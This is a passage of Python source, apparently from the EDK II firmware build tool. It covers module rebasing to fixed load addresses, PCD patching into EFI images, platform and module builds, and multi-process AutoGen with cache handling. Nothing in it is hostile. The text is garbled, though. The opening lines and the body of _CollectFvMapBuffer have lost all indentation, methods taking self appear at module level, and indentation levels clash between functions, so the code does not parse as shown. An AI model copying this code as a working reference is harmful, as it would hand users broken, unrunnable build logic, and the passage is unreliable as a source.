# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile(r"\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.append(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.append('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
    def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
        """Classify modules by phase, patch fixed-load-address PCDs into their
        EFI images, and rebase each group, appending map text to MapBuffer.

        @param MapBuffer   List receiving the formatted map text.
        @param ModuleList  Dict of module objects keyed by module GUID.
        """
        sys.stdout.write ("Generate Load Module At Fix Address Map")
        sys.stdout.flush()
        PatchEfiImageList = []
        PeiModuleList  = {}
        BtModuleList   = {}
        RtModuleList   = {}
        SmmModuleList  = {}
        PeiSize = 0
        BtSize  = 0
        RtSize  = 0
        # reserve 4K size in SMRAM to make SMM module address not from 0.
        SmmSize = 0x1000
        for ModuleGuid in ModuleList:
            Module = ModuleList[ModuleGuid]
            GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)

            OutputImageFile = ''
            for ResultFile in Module.CodaTargetList:
                if str(ResultFile.Target).endswith('.efi'):
                    #
                    # module list for PEI, DXE, RUNTIME and SMM
                    #
                    OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
                    ImageClass = PeImageClass (OutputImageFile)
                    if not ImageClass.IsValid:
                        EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
                    ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
                    # Bucket the image by its execution phase and accumulate
                    # the size budget for that phase.
                    if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
                        PeiModuleList[Module.MetaFile] = ImageInfo
                        PeiSize += ImageInfo.Image.Size
                    elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
                        BtModuleList[Module.MetaFile] = ImageInfo
                        BtSize += ImageInfo.Image.Size
                    elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
                        RtModuleList[Module.MetaFile] = ImageInfo
                        RtSize += ImageInfo.Image.Size
                    elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
                        SmmModuleList[Module.MetaFile] = ImageInfo
                        SmmSize += ImageInfo.Image.Size
                        if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
                            PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
                            # for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
                            if int(PiSpecVersion, 16) < 0x0001000A:
                                BtModuleList[Module.MetaFile] = ImageInfo
                                BtSize += ImageInfo.Image.Size
                    break
            #
            # EFI image is final target.
            # Check EFI image contains patchable FixAddress related PCDs.
            #
            if OutputImageFile != '':
                ModuleIsPatch = False
                for Pcd in Module.ModulePcdList:
                    if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
                        ModuleIsPatch = True
                        break
                if not ModuleIsPatch:
                    for Pcd in Module.LibraryPcdList:
                        if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
                            ModuleIsPatch = True
                            break

                if not ModuleIsPatch:
                    continue
                #
                # Module includes the patchable load fix address PCDs.
                # It will be fixed up later.
                #
                PatchEfiImageList.append (OutputImageFile)

        #
        # Get Top Memory address
        #
        ReservedRuntimeMemorySize = 0
        TopMemoryAddress = 0
        if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
            TopMemoryAddress = 0
        else:
            TopMemoryAddress = self.LoadFixAddress
            if TopMemoryAddress < RtSize + BtSize + PeiSize:
                EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")

        #
        # Patch FixAddress related PCDs into EFI image
        #
        for EfiImage in PatchEfiImageList:
            EfiImageMap = EfiImage.replace('.efi', '.map')
            if not os.path.exists(EfiImageMap):
                continue
            #
            # Get PCD offset in EFI image by GenPatchPcdTable function
            #
            PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
            #
            # Patch real PCD value by PatchPcdValue tool
            #
            for PcdInfo in PcdTable:
                ReturnValue = 0
                if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize // 0x1000))
                elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize // 0x1000))
                elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize // 0x1000))
                elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize // 0x1000))
                if ReturnValue != 0:
                    EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)

        # Emit the per-phase page counts, then rebase each phase's modules.
        MapBuffer.append('PEI_CODE_PAGE_NUMBER      = 0x%x\n' % (PeiSize // 0x1000))
        MapBuffer.append('BOOT_CODE_PAGE_NUMBER     = 0x%x\n' % (BtSize // 0x1000))
        MapBuffer.append('RUNTIME_CODE_PAGE_NUMBER  = 0x%x\n' % (RtSize // 0x1000))
        if len (SmmModuleList) > 0:
            MapBuffer.append('SMM_CODE_PAGE_NUMBER      = 0x%x\n' % (SmmSize // 0x1000))

        PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
        BtBaseAddr  = TopMemoryAddress - RtSize
        RtBaseAddr  = TopMemoryAddress - ReservedRuntimeMemorySize

        self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
        self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
        self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
        self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
        MapBuffer.append('\n\n')
        sys.stdout.write ("\n")
        sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
    """Write the accumulated address-map text to <BuildDir>/<Name>.map.

    MapBuffer is a list of text fragments produced by the map-collection
    helpers; Wa supplies the build directory and platform name.
    """
    #
    # Compose the map file path under the workspace build directory.
    #
    MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
    #
    # Save address map into MAP file.
    #
    SaveFileOnChange(MapFilePath, ''.join(MapBuffer), False)
    if self.LoadFixAddress != 0:
        # Tell the user where the map is only when fixed-address loading is on.
        sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
        sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
    """Build the active platform once per (target, toolchain) pair.

    For each pair: run workspace/platform AutoGen, build every module via
    _BuildPa, then (for ''/'all'/'fds' targets) rebase images, regenerate
    the FD and emit the platform MAP file.
    """
    SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress
                    )
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            self.BuildReport.AddPlatformReport(Wa)
            self.Progress.Stop("done!")

            # Add ffs build to makefile
            CmdListDict = {}
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd(Wa.ArchList)

            for Arch in Wa.ArchList:
                PcdMaList = []
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                for Module in Pa.Platform.Modules:
                    # Get ModuleAutoGen object to generate C code file and makefile
                    Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
                    if Ma is None:
                        continue
                    if Ma.PcdIsDriver:
                        Ma.PlatformInfo = Pa
                        Ma.Workspace = Wa
                        PcdMaList.append(Ma)
                    self.BuildModules.append(Ma)
                Pa.DataPipe.DataContainer = {"FfsCommand":CmdListDict}
                Pa.DataPipe.DataContainer = {"Workspace_timestamp": Wa._SrcTimeStamp}
                self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict,PcdMaList=PcdMaList)

            # Create MAP file when Load Fix Address is enabled.
            if self.Target in ["", "all", "fds"]:
                for Arch in Wa.ArchList:
                    GlobalData.gGlobalDefines['ARCH'] = Arch
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
                #
                # Get Module List (non-library modules only, keyed by GUID)
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma

                MapBuffer = []
                if self.LoadFixAddress != 0:
                    #
                    # Rebase module to the preferred memory address before GenFds
                    #
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)
                if self.Fdf:
                    #
                    # create FDS again for the updated EFI image
                    #
                    self._Build("fds", Wa)
                    #
                    # Create MAP file for all platform FVs after GenFds.
                    #
                    self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile (MapBuffer, Wa)
            self.CreateGuidedSectionToolsFile(Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
    """Build only the module named by self.ModuleFile.

    Platform AutoGen is still required first; the selected module is then
    auto-generated, scheduled as a BuildTask, and reported.  Returns True
    early for the pure code-generation targets 'genc'/'genmake'.
    """
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            WorkspaceAutoGenTime = time.time()
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            #
            # module build needs platform build information, so get platform
            # AutoGen first
            #
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress,
                    self.ModuleFile
                    )
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            Wa.CreateMakeFile(False)
            # Add ffs build to makefile
            CmdListDict = None
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd(Wa.ArchList)

            GlobalData.file_lock = mp.Lock()
            GlobalData.FfsCmd = CmdListDict

            self.Progress.Stop("done!")
            MaList = []
            ExitFlag = threading.Event()
            ExitFlag.clear()
            self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
            for Arch in Wa.ArchList:
                AutoGenStart = time.time()
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                for Module in Pa.Platform.Modules:
                    # Only the module the user asked for (matched by dir + name).
                    if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
                        Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
                        if Ma is None:
                            continue
                        if Ma.PcdIsDriver:
                            Ma.PlatformInfo = Pa
                            Ma.Workspace = Wa
                        MaList.append(Ma)

                        if GlobalData.gUseHashCache and not GlobalData.gBinCacheDest and self.Target in [None, "", "all"]:
                            if Ma.CanSkipbyPreMakeCache():
                                continue
                            else:
                                self.PreMakeCacheMiss.add(Ma)

                        # Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
                        if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
                            # for target which must generate AutoGen code and makefile
                            if not self.SkipAutoGen or self.Target == 'genc':
                                self.Progress.Start("Generating code")
                                Ma.CreateCodeFile(True)
                                self.Progress.Stop("done!")
                            if self.Target == "genc":
                                return True
                            if not self.SkipAutoGen or self.Target == 'genmake':
                                self.Progress.Start("Generating makefile")
                                if CmdListDict and self.Fdf and (Module.Path, Arch) in CmdListDict:
                                    Ma.CreateMakeFile(True, CmdListDict[Module.Path, Arch])
                                    del CmdListDict[Module.Path, Arch]
                                else:
                                    Ma.CreateMakeFile(True)
                                self.Progress.Stop("done!")
                            if self.Target == "genmake":
                                return True

                            if GlobalData.gBinCacheSource and self.Target in [None, "", "all"]:
                                if Ma.CanSkipbyMakeCache():
                                    continue
                                else:
                                    self.MakeCacheMiss.add(Ma)

                        self.BuildModules.append(Ma)
                self.AutoGenTime += int(round((time.time() - AutoGenStart)))
                MakeStart = time.time()
                for Ma in self.BuildModules:
                    if not Ma.IsBinaryModule:
                        Bt = BuildTask.New(ModuleMakeUnit(Ma, Pa.BuildCommand,self.Target))
                    # Break build if any build thread has error
                    if BuildTask.HasError():
                        # we need a full version of makefile for platform
                        ExitFlag.set()
                        BuildTask.WaitForComplete()
                        Pa.CreateMakeFile(False)
                        EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                    # Start task scheduler
                    if not BuildTask.IsOnGoing():
                        BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)

                # in case there's an interruption. we need a full version of makefile for platform
                Pa.CreateMakeFile(False)
                if BuildTask.HasError():
                    EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                self.MakeTime += int(round((time.time() - MakeStart)))

            MakeContiue = time.time()
            # Signal the scheduler that all tasks are queued, then drain it.
            ExitFlag.set()
            BuildTask.WaitForComplete()
            self.CreateAsBuiltInf()
            if GlobalData.gBinCacheDest:
                self.GenDestCache()
            elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
                # Only for --hash
                # Update PreMakeCacheChain files
                self.GenLocalPreMakeCache()
            self.BuildModules = []
            self.MakeTime += int(round((time.time() - MakeContiue)))
            if BuildTask.HasError():
                EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)

            self.BuildReport.AddPlatformReport(Wa, MaList)
            if MaList == []:
                EdkLogger.error(
                            'build',
                            BUILD_ERROR,
                            "Module for [%s] is not a component of active platform."\
                            " Please make sure that the ARCH and inf file path are"\
                            " given in the same as in [%s]" % \
                                (', '.join(Wa.ArchList), self.PlatformFile),
                            ExtraData=self.ModuleFile
                            )
            # Create MAP file when Load Fix Address is enabled.
            if self.Target == "fds" and self.Fdf:
                for Arch in Wa.ArchList:
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
                #
                # Get Module List (non-library modules only, keyed by GUID)
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma

                MapBuffer = []
                if self.LoadFixAddress != 0:
                    #
                    # Rebase module to the preferred memory address before GenFds
                    #
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)
                #
                # create FDS again for the updated EFI image
                #
                GenFdsStart = time.time()
                self._Build("fds", Wa)
                self.GenFdsTime += int(round((time.time() - GenFdsStart)))
                #
                # Create MAP file for all platform FVs after GenFds.
                #
                self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self,ArchList):
    """Invert the GenFfs makefile command map.

    GenFds.GenFfsMakefile yields {Cmd: (Inf, Arch)}; the returned
    defaultdict maps (Inf, Arch) -> set of Cmds so each module's FFS
    commands can be looked up together.
    """
    ffs_cmd_map = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, ArchList, GlobalData)
    inverted = defaultdict(set)
    for command, (inf_file, arch) in ffs_cmd_map.items():
        inverted[inf_file, arch].add(command)
    return inverted
def VerifyAutoGenFiles(self):
    """Check that a previous AutoGen pass can be reused (--skip-autogen).

    Reads .AutoGenIdFile.txt from the conf directory, verifies the recorded
    GlobalVar data-pipe files and per-module makefiles still exist, and
    rebuilds a WorkSpaceInfo/PlatformInfo pair from them.

    Returns:
        WorkSpaceInfo on success, or None when anything is missing or
        unreadable (caller then falls back to a full AutoGen pass).
    """
    AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
    try:
        with open(AutoGenIdFile) as fd:
            lines = fd.readlines()
    except Exception:
        # No id file (or unreadable/undecodable) -> nothing to reuse.
        # Narrowed from a bare except so SystemExit/KeyboardInterrupt escape.
        return None
    # Fix: pre-initialize the parsed fields.  The original left them unbound
    # and raised NameError when the id file was truncated or malformed.
    ArchList = None
    BuildDir = None
    PlatformGuid = None
    for line in lines:
        if "Arch" in line:
            ArchList = line.strip().split("=")[1].split("|")
        if "BuildDir" in line:
            BuildDir = line.split("=")[1].strip()
        if "PlatformGuid" in line:
            PlatformGuid = line.split("=")[1].strip()
    if not ArchList or not BuildDir or not PlatformGuid:
        # Missing key (or empty arch list, which would leave Wa unbound below).
        return None
    GlobalVarList = []
    for arch in ArchList:
        global_var = os.path.join(BuildDir, "GlobalVar_%s_%s.bin" % (str(PlatformGuid),arch))
        if not os.path.exists(global_var):
            return None
        GlobalVarList.append(global_var)
    for global_var in GlobalVarList:
        data_pipe = MemoryDataPipe()
        data_pipe.load(global_var)
        target = data_pipe.Get("P_Info").get("Target")
        toolchain = data_pipe.Get("P_Info").get("ToolChain")
        archlist = data_pipe.Get("P_Info").get("ArchList")
        Arch = data_pipe.Get("P_Info").get("Arch")
        active_p = data_pipe.Get("P_Info").get("ActivePlatform")
        workspacedir = data_pipe.Get("P_Info").get("WorkspaceDir")
        PackagesPath = os.getenv("PACKAGES_PATH")
        mws.setWs(workspacedir, PackagesPath)
        LibraryBuildDirectoryList = data_pipe.Get("LibraryBuildDirectoryList")
        ModuleBuildDirectoryList = data_pipe.Get("ModuleBuildDirectoryList")
        # Every previously generated makefile must still be present.
        for m_build_dir in LibraryBuildDirectoryList:
            if not os.path.exists(os.path.join(m_build_dir,self.MakeFileName)):
                return None
        for m_build_dir in ModuleBuildDirectoryList:
            if not os.path.exists(os.path.join(m_build_dir,self.MakeFileName)):
                return None
        Wa = WorkSpaceInfo(
            workspacedir,active_p,target,toolchain,archlist
            )
        Pa = PlatformInfo(Wa, active_p, target, toolchain, Arch,data_pipe)
        Wa.AutoGenObjectList.append(Pa)
    return Wa
def SetupMakeSetting(self,Wa):
    """Prepare the make phase when AutoGen is being skipped.

    Rebuilds the ModuleAutoGen list from the restored platform info and,
    if the platform has an FDF, re-parses it to repopulate
    GlobalData.gFdfParser and validate VPD region alignment.
    Returns the list of modules to build.
    """
    BuildModules = []
    for Pa in Wa.AutoGenObjectList:
        for m in Pa._MbList:
            ma = ModuleAutoGen(Wa,m.MetaFile, Pa.BuildTarget, Wa.ToolChain, Pa.Arch, Pa.MetaFile,Pa.DataPipe)
            BuildModules.append(ma)
    fdf_file = Wa.FlashDefinition
    if fdf_file:
        Fdf = FdfParser(fdf_file.Path)
        Fdf.ParseFile()
        GlobalData.gFdfParser = Fdf
        if Fdf.CurrentFdName and Fdf.CurrentFdName in Fdf.Profile.FdDict:
            FdDict = Fdf.Profile.FdDict[Fdf.CurrentFdName]
            for FdRegion in FdDict.RegionList:
                # The VPD FILE region must start on an 8-byte boundary.
                if str(FdRegion.RegionType) == 'FILE' and self.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
                    if int(FdRegion.Offset) % 8 != 0:
                        EdkLogger.error("build", FORMAT_INVALID, 'The VPD Base Address %s must be 8-byte aligned.' % (FdRegion.Offset))
        Wa.FdfProfile = Fdf.Profile
        self.Fdf = Fdf
    else:
        self.Fdf = None
    return BuildModules
## Build a platform in multi-thread mode
#
def PerformAutoGen(self,BuildTarget,ToolChain):
    """Run the multi-process AutoGen phase for one (target, toolchain).

    Creates workspace/platform AutoGen objects, feeds every module through
    the AutoGen worker queue, records cache hit/miss status, and writes
    .AutoGenIdFile.txt so a later --skip-autogen run can be verified.
    Returns (WorkspaceAutoGen, modules-to-build).
    """
    WorkspaceAutoGenTime = time.time()
    Wa = WorkspaceAutoGen(
            self.WorkspaceDir,
            self.PlatformFile,
            BuildTarget,
            ToolChain,
            self.ArchList,
            self.BuildDatabase,
            self.TargetTxt,
            self.ToolDef,
            self.Fdf,
            self.FdList,
            self.FvList,
            self.CapList,
            self.SkuId,
            self.UniFlag,
            self.Progress
            )
    self.Fdf = Wa.FdfFile
    self.LoadFixAddress = Wa.Platform.LoadFixAddress
    self.BuildReport.AddPlatformReport(Wa)
    Wa.CreateMakeFile(False)

    # Add ffs build to makefile
    CmdListDict = {}
    if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
        CmdListDict = self._GenFfsCmd(Wa.ArchList)

    self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
    BuildModules = []
    for Arch in Wa.ArchList:
        PcdMaList = []
        AutoGenStart = time.time()
        GlobalData.gGlobalDefines['ARCH'] = Arch
        Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
        if Pa is None:
            continue
        ModuleList = []
        for Inf in Pa.Platform.Modules:
            ModuleList.append(Inf)
        # Add the INF only list in FDF
        if GlobalData.gFdfParser is not None:
            for InfName in GlobalData.gFdfParser.Profile.InfList:
                Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
                if Inf in Pa.Platform.Modules:
                    continue
                ModuleList.append(Inf)
        # Everything the AutoGen worker processes need goes through DataPipe.
        Pa.DataPipe.DataContainer = {"FfsCommand":CmdListDict}
        Pa.DataPipe.DataContainer = {"Workspace_timestamp": Wa._SrcTimeStamp}
        Pa.DataPipe.DataContainer = {"CommandTarget": self.Target}
        Pa.CreateLibModuelDirs()
        # Fetch the MakeFileName.
        self.MakeFileName = Pa.MakeFileName
        Pa.DataPipe.DataContainer = {"LibraryBuildDirectoryList":Pa.LibraryBuildDirectoryList}
        Pa.DataPipe.DataContainer = {"ModuleBuildDirectoryList":Pa.ModuleBuildDirectoryList}
        Pa.DataPipe.DataContainer = {"FdsCommandDict": Wa.GenFdsCommandDict}
        # Prepare the cache share data for multiprocessing
        Pa.DataPipe.DataContainer = {"gPlatformHashFile":GlobalData.gPlatformHashFile}
        ModuleCodaFile = {}
        for ma in Pa.ModuleAutoGenList:
            ModuleCodaFile[(ma.MetaFile.File,ma.MetaFile.Root,ma.Arch,ma.MetaFile.Path)] = [item.Target for item in ma.CodaTargetList]
        Pa.DataPipe.DataContainer = {"ModuleCodaFile":ModuleCodaFile}
        # ModuleList contains all driver modules only
        for Module in ModuleList:
            # Get ModuleAutoGen object to generate C code file and makefile
            Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
            if Ma is None:
                continue
            if Ma.PcdIsDriver:
                Ma.PlatformInfo = Pa
                Ma.Workspace = Wa
                PcdMaList.append(Ma)
            self.AllDrivers.add(Ma)
            self.AllModules.add(Ma)

        mqueue = mp.Queue()
        cqueue = mp.Queue()
        for m in Pa.GetAllModuleInfo:
            mqueue.put(m)
            module_file,module_root,module_path,module_basename,\
                module_originalpath,module_arch,IsLib = m
            Ma = ModuleAutoGen(Wa, PathClass(module_path, Wa), BuildTarget,\
                ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
            self.AllModules.add(Ma)
        data_pipe_file = os.path.join(Pa.BuildDir, "GlobalVar_%s_%s.bin" % (str(Pa.Guid),Pa.Arch))
        Pa.DataPipe.dump(data_pipe_file)

        # Sentinel tuple tells the workers the queue is exhausted.
        mqueue.put((None,None,None,None,None,None,None))
        autogen_rt, errorcode = self.StartAutoGen(mqueue, Pa.DataPipe, self.SkipAutoGen, PcdMaList, cqueue)

        if not autogen_rt:
            self.AutoGenMgr.TerminateWorkers()
            self.AutoGenMgr.join(1)
            raise FatalError(errorcode)

        if GlobalData.gUseHashCache:
            for item in GlobalData.gModuleAllCacheStatus:
                (MetaFilePath, Arch, CacheStr, Status) = item
                Ma = ModuleAutoGen(Wa, PathClass(MetaFilePath, Wa), BuildTarget,\
                    ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
                if CacheStr == "PreMakeCache" and Status == False:
                    self.PreMakeCacheMiss.add(Ma)
                if CacheStr == "PreMakeCache" and Status == True:
                    self.PreMakeCacheHit.add(Ma)
                    GlobalData.gModuleCacheHit.add(Ma)
                if CacheStr == "MakeCache" and Status == False:
                    self.MakeCacheMiss.add(Ma)
                if CacheStr == "MakeCache" and Status == True:
                    self.MakeCacheHit.add(Ma)
                    GlobalData.gModuleCacheHit.add(Ma)
        self.AutoGenTime += int(round((time.time() - AutoGenStart)))
    # Record this AutoGen pass's identity for later --skip-autogen reuse.
    AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
    with open(AutoGenIdFile,"w") as fw:
        fw.write("Arch=%s\n" % "|".join((Wa.ArchList)))
        fw.write("BuildDir=%s\n" % Wa.BuildDir)
        fw.write("PlatformGuid=%s\n" % str(Wa.AutoGenObjectList[0].Guid))

    if GlobalData.gBinCacheSource:
        BuildModules.extend(self.MakeCacheMiss)
    elif GlobalData.gUseHashCache and not GlobalData.gBinCacheDest:
        BuildModules.extend(self.PreMakeCacheMiss)
    else:
        BuildModules.extend(self.AllDrivers)
    self.Progress.Stop("done!")
